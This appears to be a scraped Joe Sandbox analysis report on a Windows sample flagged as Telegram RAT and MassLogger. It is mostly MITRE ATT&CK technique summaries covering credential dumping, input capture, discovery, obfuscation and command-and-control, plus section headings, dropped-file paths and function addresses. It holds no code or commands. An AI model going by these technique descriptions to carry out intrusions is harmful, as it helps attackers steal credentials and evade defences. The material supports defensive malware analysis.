Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nfKqna8HuC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut63EE.tmp

C:\Users\user\AppData\Local\Temp\thixophobia

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
nfKqna8HuC.exe

Function 0064B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00623D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0063DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0062406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0066FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00623F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0066BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00623742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00623E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 0064ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 014DEF90 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 006236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 014DED30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre